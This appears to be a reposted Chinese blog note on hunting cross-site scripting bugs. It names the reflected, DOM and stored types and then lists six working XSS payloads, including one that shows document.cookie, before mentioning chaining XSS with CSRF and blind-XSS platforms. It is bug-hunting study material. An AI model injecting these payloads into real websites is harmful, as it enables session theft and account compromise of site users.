码迷,mamicode.com
首页 > 其他好文 > 详细

漏洞挖掘之xss

时间:2020-02-19 06:01:54      阅读:69      评论:0      收藏:0      [点我收藏+]

标签:漏洞   one   http   textarea   输入   info   tin   rip   tar   

xss(跨站脚本)

分类:1.反射型xss

   2.DOM型xss

     3.存储型xss

 

这是某次挖的xss

 

技术图片

 

存储型xss可能出现在评论处,用户个人信息处等

技术图片

 

 

部分xsspaload:

"><script>alert(1)</script>//
<img src=x onerror=alert(2)>
<svg /onload=alert`1`>
<embed src=//tiny.cc>
</textarea><script>alert(document.cookie)</script><textarea>
</span><img src=x onerror=alert(1)><span>

 

一切存在输入的地方皆可能存在xss,注意xss不仅仅是弹框

利用:xss+csrf 

   盲打平台

   ...

 

漏洞挖掘之xss

标签:漏洞   one   http   textarea   输入   info   tin   rip   tar   

原文地址:https://www.cnblogs.com/akihi-lu1l/p/12329539.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!